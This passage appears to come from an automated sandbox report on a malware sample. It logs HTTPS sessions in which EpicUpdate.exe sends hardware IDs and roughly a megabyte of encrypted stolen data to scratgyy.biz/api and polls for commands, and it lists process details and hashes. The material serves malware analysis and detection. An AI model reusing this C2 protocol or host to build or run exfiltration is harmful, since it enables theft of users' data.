2024-10-27 16:04:55 UTC	15331	OUT	Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 36 43 45 38 31 45 31 45 42 31 32 39 46 44 34 43 44 42 37 31 45 33 32 46 31 32 38 38 35 43 42 33 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 51 78 69 4d 4a 49 2d 2d 52 45 44 4c 49 Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"6CE81E1EB129FD4CDB71E32F12885CB3--be85de5ipdocierre1Content-Disposition: form-data; name="pid"3--be85de5ipdocierre1Content-Disposition: form-data; name="lid"QxiMJI--REDLI
2024-10-27 16:04:55 UTC	5240	OUT	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d6 b9 4d d1 61 7a dd 77 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 eb 5c 6f 74 98 5e f7 dd 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 3a b7 29 3a 4c af fb 6e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 9d eb 8d 0e d3 eb be 1b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 58 e7 36 45 87 e9 75 df 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ac 73 bd d1 61 7a dd 77 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: Mazw\ot^:):Ln`X6Eusazw
2024-10-27 16:04:55 UTC	1012	IN	HTTP/1.1 200 OK Date: Sun, 27 Oct 2024 16:04:55 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=upel6825hb5oft07h4b0rftop8; expires=Thu, 20 Feb 2025 09:51:34 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=63VuWAWRtbQozIWHxNE8%2F0FNxXk54PQQ33i5y8RoF7HgzFNR86lA6C%2Fr8DPLZrqLJSyLBAN%2B1rReT71ZXhzAivMFutd%2FftnPOuyp2j9O0rpz%2FP6zejk4mnr4MxEg2P0%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8d93ecb5bf411861-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=94715&sent=15&recv=24&lost=0&retrans=0&sent_bytes=2826&recv_bytes=21529&delivery_rate=40315&cwnd=252&unsent_bytes=0&cid=9a7e3431d6b0f7ee&ts=520&x=0"
2024-10-27 16:04:55 UTC	23	IN	Data Raw: 31 31 0d 0a 6f 6b 20 31 39 31 2e 39 36 2e 31 35 30 2e 32 32 39 0d 0a Data Ascii: 11ok 191.96.150.229
2024-10-27 16:04:55 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.11.20	49770	104.21.64.165	443	1044	C:\Users\user\AppData\Local\Temp\EpicUpdate.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-27 16:04:56 UTC	277	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 1260 Host: scratgyy.biz
2024-10-27 16:04:56 UTC	1260	OUT	Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 36 43 45 38 31 45 31 45 42 31 32 39 46 44 34 43 44 42 37 31 45 33 32 46 31 32 38 38 35 43 42 33 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 51 78 69 4d 4a 49 2d 2d 52 45 44 4c 49 Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"6CE81E1EB129FD4CDB71E32F12885CB3--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"QxiMJI--REDLI
2024-10-27 16:04:56 UTC	1005	IN	HTTP/1.1 200 OK Date: Sun, 27 Oct 2024 16:04:56 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=6k2vjfbnq9j8fchmd8ogfk1bt1; expires=Thu, 20 Feb 2025 09:51:35 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=EwGSp1XCgkb8ZGj7k2cGLgnhhcdjn8%2B8TmlHFCwXK2KQA2P1LTIf4rkNuU9C8uarN3MeZgjdEpVfU%2BDU7nzDVXTGatreZ4m73WHDXTusQc4%2BIiLaRFNc1gpWDQSVdBM%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8d93ecba8c4b42a7-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=93821&sent=6&recv=9&lost=0&retrans=0&sent_bytes=2828&recv_bytes=2173&delivery_rate=40796&cwnd=252&unsent_bytes=0&cid=90bfd8812e48b00b&ts=453&x=0"
2024-10-27 16:04:56 UTC	23	IN	Data Raw: 31 31 0d 0a 6f 6b 20 31 39 31 2e 39 36 2e 31 35 30 2e 32 32 39 0d 0a Data Ascii: 11ok 191.96.150.229
2024-10-27 16:04:56 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.11.20	49771	104.21.64.165	443	1044	C:\Users\user\AppData\Local\Temp\EpicUpdate.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-27 16:04:57 UTC	280	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 1065767 Host: scratgyy.biz
2024-10-27 16:04:57 UTC	15331	OUT	Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 36 43 45 38 31 45 31 45 42 31 32 39 46 44 34 43 44 42 37 31 45 33 32 46 31 32 38 38 35 43 42 33 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 51 78 69 4d 4a 49 2d 2d 52 45 44 4c 49 Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"6CE81E1EB129FD4CDB71E32F12885CB3--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"QxiMJI--REDLI
2024-10-27 16:04:57 UTC	15331	OUT	Data Raw: c2 d1 88 cf 0c 4c f3 18 ec ed f0 98 93 87 e8 fa d0 83 04 ef 62 44 91 81 9e d3 4d d8 f1 77 05 c6 1f c7 f7 19 09 d7 87 2a a3 e6 0f ce 52 e7 54 07 a5 52 4d c3 67 54 77 17 e1 38 07 f7 2d 0f cc 60 a1 5d 49 45 05 a9 51 67 2d 47 08 58 22 b4 0c 99 5f c5 dd fa a8 36 b0 65 15 53 ba dd da e6 5f dc ac 43 13 89 15 77 90 00 12 b8 db 06 03 3a 6c ab e6 d8 95 36 ab 52 e5 c6 bd 0f 0b cb 0a 93 8e 16 0d 4b 13 03 57 98 b4 2b 16 35 53 cd 03 fd 46 a4 8a d8 d9 42 b1 ab dd e3 3b bc 81 70 05 2b 17 8b a8 0e 15 a7 ac 10 de a5 3e 15 47 f7 90 fd e9 85 ad bc b8 93 f3 3e 03 c8 a8 78 f3 79 b2 13 b9 89 27 39 50 b1 b4 75 7d bd 24 2f be 78 7b dd 61 bf 69 7b 1d 97 e0 ba db ae 32 be f1 1a 42 31 83 ee d9 8b 40 bb c5 01 b1 bf e0 24 da 08 f1 22 6d b2 cf 31 54 a0 fd fe 9c 92 08 be 4e e6 17 2b 4a Data Ascii: LbDMw*RTRMgTw8-`]IEQg-GX"_6eS_Cw:l6RKW+5SFB;p+>G>xy'9Pu}$/x{ai{2B1@$"m1TN+J
2024-10-27 16:04:57 UTC	15331	OUT	Data Raw: 55 b7 37 25 de 4d 26 25 7a cf 5a 8f 0a 10 0a 52 86 8c 19 c7 72 5a 4c 13 11 a4 52 48 4a 46 d3 f4 5d 3f b1 0d 5d 51 ef dc 74 89 0d dd 22 3e e3 f3 e3 d5 54 4f b4 6e cf 73 97 00 9f 2c 35 60 f0 a2 66 8f d4 4f db ba 4a 30 4b ad 34 5e f2 b5 ce a6 1c d5 a3 b6 59 23 83 21 94 52 39 41 a5 96 0a 3d 6a eb 8f 39 e9 da ee 0a bd be 2f a3 73 d0 5a af c7 29 b2 d3 db 67 eb e3 08 64 00 d5 76 3f cc 84 bf 14 7a 85 d0 78 24 55 ea 13 d4 1b 1c d8 ce 8a 1f db f4 c1 f8 17 87 c7 ec be bf 8b 94 05 8f 98 5f f9 aa cc b9 4e d3 a8 e7 cb dd e5 5b b7 4c ff 4e 4b 94 e6 d3 b1 b8 7e 0b 96 a0 96 8d 98 2b 96 e5 75 5e b9 17 12 b1 1a 9b eb e2 ff 1b 3c 72 c2 cd e3 33 f1 ae c2 50 d8 e2 73 a9 1f 6d 7b 64 1b af 9b 49 ad a5 be 8c 20 91 40 dc 6d 7e a6 ad 15 53 5c 5a 3c 63 b9 2b d1 d5 bb 94 ed 9b 16 6e Data Ascii: U7%M&%zZRrZLRHJF]?]Qt">TOns,5`fOJ0K4^Y#!R9A=j9/sZ)gdv?zx$U_N[LNK~+u^<r3Psm{dI @m~S\Z<c+n
2024-10-27 16:04:57 UTC	15331	OUT	Data Raw: dd 3b 2d ff 52 b7 bd 9d 91 fe fb 6f 4b e4 45 8b 4e 44 f7 c7 58 c9 85 98 b0 ed a6 b5 18 7b a1 4d 5b d9 2a a9 46 39 bb 68 48 ab 02 35 1b 7f e3 7b 8b b4 53 ef 95 01 e8 f7 01 e8 8f 66 11 a0 1b 46 02 fb c5 3e 84 73 37 4a 73 c0 8d b0 04 3e bf 8a 10 68 f1 fe db 57 1c 00 f3 d8 e9 7f 67 97 02 f3 d9 01 00 85 a7 09 50 dd a2 17 3d 2f a3 58 65 cf 12 7f b5 9b 6a 6b ce 9f 90 d0 44 ba 27 84 92 d3 57 07 a5 1c bb 23 13 4b 59 74 3b 15 2a 92 c4 80 d0 2d 15 e6 bc 4a 18 72 d6 d1 ca 80 97 f1 1e f7 f7 cf 6c 4d 8c 2e 6f dc 7d 29 e0 14 7b d6 79 d2 f5 66 bf 86 a5 11 02 4c 32 6a 26 c2 3d 6b 76 c3 3d 6f 2c 6b b2 06 a0 6e 03 3a 65 38 48 a5 53 af 60 24 0f 08 75 b3 d2 67 c7 0f 4a d7 26 14 53 bc 16 c1 e6 83 8c bf c5 3b 11 e7 b8 76 14 88 d4 d2 d0 ca 4b ae 4d bd cc f1 b3 af 7c ec 22 15 e6 Data Ascii: ;-RoKENDX{M[F9hH5{SfF>s7Js>hWgP=/XejkD'W#KYt;-JrlM.o}){yfL2j&=kv=o,kn:e8HS`$ugJ&S;vKM\|"
2024-10-27 16:04:57 UTC	15331	OUT	Data Raw: 2e 0a 5d 1a 6e ac a6 d3 cf 02 8a 54 3a ce ba e9 dc 66 7d 15 a5 3d 57 41 25 e2 e2 43 df 4e ce 24 d6 ee 09 91 31 8c 50 47 96 36 98 79 1f 57 70 5e 35 d0 4c b3 a1 28 2b 5c 1a 87 db c6 22 bf ec cb b6 bd 41 3d 66 9f e4 67 6b 70 48 c1 3e df 60 f9 5d 7c 35 de 49 af 69 da 8c 6f 7a a5 96 90 07 73 39 ba 1f eb 43 22 ae c7 3d ad 7f 93 ac 7c 95 a6 81 f5 39 ba d1 55 d9 11 75 70 6e c8 07 d4 d4 8d 8a 12 9f 43 68 06 42 5a 2a 6c 3a ca d7 5c 4d 5f bc 75 08 8c 61 ad 5a 3e 11 d5 41 d4 05 4b 8b b9 af 1c 19 1f ce db ba 24 3e 65 2a 48 1b 7d 10 38 12 f1 b9 3b 6d 2b af f0 44 48 21 a1 6e 58 cd 05 fb 19 f3 9a bb e5 da 8d f5 1e 94 f9 7e 26 7f b8 d4 c8 37 7b 28 39 46 b9 dd 40 b5 a5 db 25 b7 44 da 05 6a 98 7f e8 c4 b3 b4 26 84 1b fb 2a 80 79 45 df 2d 93 b1 2b 56 81 86 e6 1b c5 fb 2d 07 Data Ascii: .]nT:f}=WA%CN$1PG6yWp^5L(+\"A=fgkpH>`]\|5Iiozs9C"=\|9UupnChBZl:\M_uaZ>AK$>eH}8;m+DH!nX~&7{(9F@%Dj&*yE-+V-
2024-10-27 16:04:57 UTC	15331	OUT	Data Raw: 64 36 b4 ea 8a 33 32 a3 a6 47 3b 1a 75 34 46 71 5f 89 34 5c 8d d6 0d 2a 07 2a a2 29 a2 9f bf 88 f6 23 e1 08 0d 43 27 4b c4 7d 65 81 cc 1a 1a 47 59 05 bd 55 ba db 65 9a e8 d4 03 46 7c c5 75 81 1e 81 3e 02 88 3b f8 6e 70 39 c8 f0 59 ad cb a9 93 8b 73 fa 7b 55 fc ba 54 d0 33 f7 9a 01 24 52 8f f9 ea 5b 83 b9 e0 9d 02 7c a5 a1 e0 af 81 68 5a c6 31 99 35 a5 ed d7 90 2e 97 4e 76 d7 96 12 b8 64 bb 5f e3 75 78 47 e6 29 d9 64 bd 13 14 e7 76 fd 9e d4 4a 13 2a b4 e7 6c 4d 30 b5 f7 d3 50 7a 4b 88 32 13 36 a0 04 28 cf b3 b5 62 df 92 9e 51 ad 26 de 6f 7f ec 94 1e c8 c7 93 f7 e0 95 79 17 c7 45 5c bd bf 35 19 f4 61 cf dc d8 8d e9 cd 1f 9d 17 d3 77 2e ee ff 7c 71 bf 59 a9 63 98 76 e2 6d a8 a8 3a bd 68 a6 78 38 36 da ba b1 f0 b5 2e 7f e4 ed 29 80 ca 19 15 2a 9d 08 4c 18 b5 Data Ascii: d632G;u4Fq_4\*)#C'K}eGYUeF\|u>;np9Ys{UT3$R[\|hZ15.Nvd_uxG)dvJlM0PzK26(bQ&oyE\5aw.\|qYcvm:hx86.)*L
2024-10-27 16:04:57 UTC	15331	OUT	Data Raw: d5 92 34 91 6e 10 6f 39 6b 6b 29 f1 6c b4 b7 c9 5d 22 38 41 a4 23 48 44 86 be e8 b7 e8 b3 85 c1 09 93 c9 f1 d4 65 b1 0f 38 ee 67 eb 7c 81 e9 8b 2d f2 e0 20 ac ce 9a 75 8b f1 62 0d 05 18 da 23 35 79 4d 92 7e 1e 64 a9 bf 31 1e 6f df b0 ff b0 85 3d bc 06 9e fc b6 6b 04 f0 d4 34 b0 55 a6 e8 ac 55 4b a8 7c b6 7c 14 93 fd f1 b4 a5 d7 2c 28 fb a3 f9 c1 bc 6c f5 c2 65 06 ce 0e a9 79 0c 88 62 4b 39 47 52 11 1e f5 14 0f 16 50 bf b2 06 0e 7c fe 2c ad 72 89 6a 71 2f 54 1e 75 f3 c4 bc 95 a8 c2 0f 0a 75 c4 f8 1e 48 3d 5e 24 3b 89 e8 06 c5 13 6a aa 75 5c 04 44 c0 e5 59 86 3e e2 60 3e 09 92 b6 d5 40 b0 26 fe 71 a9 96 c2 68 19 4b 0e b3 3f 17 d4 70 47 91 45 e7 20 f9 90 70 e8 67 e3 3f f8 ae 9f 80 9b ec b0 fd 42 75 3e cc 88 ba ac 78 5d ab ce f8 7d fd 1f 46 b5 57 94 7b e6 3d Data Ascii: 4no9kk)l]"8A#HDe8g\|- ub#5yM~d1o=k4UUK\|\|,(leybK9GRP\|,rjq/TuuH=^$;ju\DY>`>@&qhK?pGE pg?Bu>x]}FW{=
2024-10-27 16:04:57 UTC	15331	OUT	Data Raw: 31 4e a1 10 f2 66 31 98 f0 28 61 ac 23 d2 69 94 0c 4c 2c 80 c4 e9 87 9b 94 f8 6a dc cc 25 5a f8 a5 aa e7 3d 36 6c 57 ca 8f c9 ed e9 4c 71 4e d0 af b5 e0 31 bb a6 92 63 7c 47 85 6e 50 70 ad 1c b2 fc a3 ed 3c 20 ce 9f db 3c 24 e7 e6 6c b8 8b 2a 85 af 55 f4 91 7d 17 84 0c b0 f3 b2 d5 5b 9e 15 8f e8 6e b6 65 82 43 4f 83 bd 0e 10 f5 bd 47 29 2d 17 51 a1 b2 29 8a c7 e7 ed e9 57 17 62 2c fe 0e 5d 91 0e 57 dd bb 95 0c 34 d5 e1 9f c4 77 c8 66 86 f6 f8 75 3e 72 7e d9 ac 2a 9b 05 56 6b 64 a4 78 8f 9f 6e 3a c1 4b 3d 82 b2 8c 23 e9 d4 01 4c 71 c9 79 39 ba 9e ee 75 7d c3 fa 74 c8 4c 50 90 10 0f a5 44 00 96 f2 9b c6 f0 21 1d 6c 0d 79 ed ab 5c 97 74 1c b4 5c 2a c0 d3 a8 5c 75 26 09 c2 10 35 67 7b 24 53 4f 7f 4c 6d bb a1 7c 2a 95 94 86 8a 6f 43 82 2a f0 83 cd 67 4f 47 e2 Data Ascii: 1Nf1(a#iL,j%Z=6lWLqN1c\|GnPp< <$lU}[neCOG)-Q)Wb,]W4wfu>r~Vkdxn:K=#Lqy9u}tLPD!ly\t\\u&5g{$SOLm\|oC*gOG
2024-10-27 16:04:57 UTC	15331	OUT	Data Raw: 43 f5 a9 f5 93 b1 7e 32 a9 12 af 60 98 4d 11 b5 f0 09 14 61 2d 89 c0 a0 bb 31 77 ba 78 7c 85 ff 4d af cb a4 01 d2 19 d4 a4 e3 a2 46 84 84 49 a9 ce 5e 85 04 0e ad ca 95 d4 a3 9a 1b 07 7e 34 8a 08 79 6b 28 cf 54 81 76 9c 67 62 3a 03 2b 3e a4 d2 2c 98 72 7c 75 c4 01 0c c4 af 4c a9 ff 9f 9b ca f6 96 fe 77 24 f9 da 43 4d 50 6f fc 33 28 39 59 25 3e 40 2a c6 e1 b6 37 88 69 3b 71 04 9a 9a 75 e8 fc b8 0c ee 0c 3d 32 06 28 cb c6 c6 ee cc d5 da 12 bb 41 85 11 0c 29 ea df 63 20 ae 93 4a 7d 4e 92 27 d0 fc a8 e1 06 70 4b 59 ca 5c fc 5c a4 e9 11 19 0b 82 e0 5a e8 d0 42 d6 2e ed 49 37 c4 b4 05 ce db a3 ea 7c c3 6d ea bc b4 39 8d b9 70 4e 56 cf 59 f2 ce aa 83 d8 41 57 26 c1 51 11 7d 7a 45 47 ee 45 74 b6 65 01 e4 58 b1 86 28 12 16 9d 65 b2 f6 a2 02 e6 1f ac 20 98 dc 5e 28 Data Ascii: C~2`Ma-1wx\|MFI^~4yk(Tvgb:+>,r\|uLw$CMPo3(9Y%>@*7i;qu=2(A)c J}N'pKY\\ZB.I7\|m9pNVYAW&Q}zEGEteX(e ^(
2024-10-27 16:04:57 UTC	15331	OUT	Data Raw: 5c 36 af d8 69 3f e1 70 6f 90 71 36 a7 67 8a 9f 8b 39 7b 24 ea 31 a7 b5 7e 68 ac 3c e7 a1 b9 7e cb 14 4a e0 f8 5b f6 f2 d3 93 6e 24 4f a7 95 4f 47 86 7e 3e 78 a4 2c 10 4f 36 fa 9f 62 65 ba 37 f1 cd e9 b9 a3 5f 12 8a 20 cc 95 22 43 72 62 e9 e1 7e fd 77 1a 22 85 2f 31 20 41 cc 11 05 9e a7 8c b4 97 0c 50 66 cf df 5a 95 ea 4d 46 80 db f8 94 c3 08 55 34 57 7f 72 fa 47 e5 c3 38 c4 d1 20 c0 c9 36 54 85 a9 2f 75 57 82 df 22 9b b2 2a a6 84 94 4f 2a 76 e0 60 d1 23 9a 42 1a e5 e2 31 24 d5 e2 67 43 bd fb ef 28 2d 27 40 00 ce 6c 5c 00 9b b7 91 72 a6 9b af 50 19 bb 00 2f e9 bb 5d 4f 95 02 59 c5 d0 76 77 27 8f 3b 96 2c 3c ce be 2d 40 9f da 80 c7 48 e9 2e fa bb 9f c8 33 8a 3f f2 c1 2e 6f 69 00 fc 07 a8 0a cb 72 40 d2 3d 91 7a 2d d9 98 cd 5d 3b 5c 67 c9 f3 5c 83 ce 41 bf Data Ascii: \6i?poq6g9{$1~h<~J[n$OOG~>x,O6be7_ "Crb~w"/1 APfZMFU4WrG8 6T/uW"Ov`#B1$gC(-'@l\rP/]OYvw';,<-@H.3?.oir@=z-];\g\A
2024-10-27 16:04:59 UTC	1021	IN	HTTP/1.1 200 OK Date: Sun, 27 Oct 2024 16:04:59 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=59hbv3gfk0tqv65ld2ljsapupk; expires=Thu, 20 Feb 2025 09:51:37 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=FEfunCmwq4%2FrnW9YHENKOjnn8ISz80oDiQSTooVzX3dCNoQfLkUc6%2Bm8OVM%2FhWQURpH%2FUdB2Ql9GahPGiGzCvdnX%2Fl%2B5rVU2bctIyJOAPhEMZLUlLbIaso8DjvOl%2F1E%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8d93ecc12ee241f3-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=93823&sent=228&recv=846&lost=0&retrans=0&sent_bytes=2827&recv_bytes=1069719&delivery_rate=40783&cwnd=252&unsent_bytes=0&cid=7ba9f7b29d803ec1&ts=2211&x=0"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.11.20	49772	104.21.64.165	443	1044	C:\Users\user\AppData\Local\Temp\EpicUpdate.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-27 16:04:59 UTC	260	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 86 Host: scratgyy.biz
2024-10-27 16:04:59 UTC	86	OUT	Data Raw: 61 63 74 3d 67 65 74 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 51 78 69 4d 4a 49 2d 2d 52 45 44 4c 49 5a 41 52 44 26 6a 3d 26 68 77 69 64 3d 36 43 45 38 31 45 31 45 42 31 32 39 46 44 34 43 44 42 37 31 45 33 32 46 31 32 38 38 35 43 42 33 Data Ascii: act=get_message&ver=4.0&lid=QxiMJI--REDLIZARD&j=&hwid=6CE81E1EB129FD4CDB71E32F12885CB3
2024-10-27 16:04:59 UTC	1006	IN	HTTP/1.1 200 OK Date: Sun, 27 Oct 2024 16:04:59 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=ogvpohcbmg7pb8uqr5cqvuibdd; expires=Thu, 20 Feb 2025 09:51:38 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=amP3aw9%2BAcYMSkPNW0S52SqmIjP02GiuJfsgkUxI0d7LZXKFgxQ8n%2FcPE8CCxHrQKCP%2FCd38Yok9emoikJA%2BrzKgZITSGm0c8BN1FMjkfNxgwkvsqHDeU1aFpTEVgyg%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8d93ecd10d20434f-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=94255&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2827&recv_bytes=982&delivery_rate=40597&cwnd=252&unsent_bytes=0&cid=367ee94304042b0d&ts=512&x=0"
2024-10-27 16:04:59 UTC	54	IN	Data Raw: 33 30 0d 0a 54 2b 4b 42 52 59 6d 4a 53 58 38 68 58 4c 4e 53 46 58 2f 63 69 31 63 65 4e 49 57 4a 39 37 51 6a 41 58 73 33 59 65 47 4f 74 6c 73 55 76 77 3d 3d 0d 0a Data Ascii: 30T+KBRYmJSX8hXLNSFX/ci1ceNIWJ97QjAXs3YeGOtlsUvw==
2024-10-27 16:04:59 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Target ID:	0
Start time:	12:03:11
Start date:	27/10/2024
Path:	C:\Users\user\Desktop\SecuriteInfo.com.Win64.CrypterX-gen.14264.32283.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\Desktop\SecuriteInfo.com.Win64.CrypterX-gen.14264.32283.exe"
Imagebase:	0x7ff600050000
File size:	972'800 bytes
MD5 hash:	6B47CFD828D584F77AA7496B094C1F82
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	12:03:54
Start date:	27/10/2024
Path:	C:\Users\user\AppData\Local\Temp\EpicUpdate.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\EpicUpdate.exe"
Imagebase:	0xb0000
File size:	569'344 bytes
MD5 hash:	A714F3782DA3635B8054341B43EFF069
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 100%, Joe Sandbox ML
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	12:04:32
Start date:	27/10/2024
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --profile-directory="Default"
Imagebase:	0x7ff7dbe10000
File size:	2'742'376 bytes
MD5 hash:	BB7C48CDDDE076E7EB44022520F40F77
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	false

Show Windows behavior

Target ID:	4
Start time:	12:04:33
Start date:	27/10/2024
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
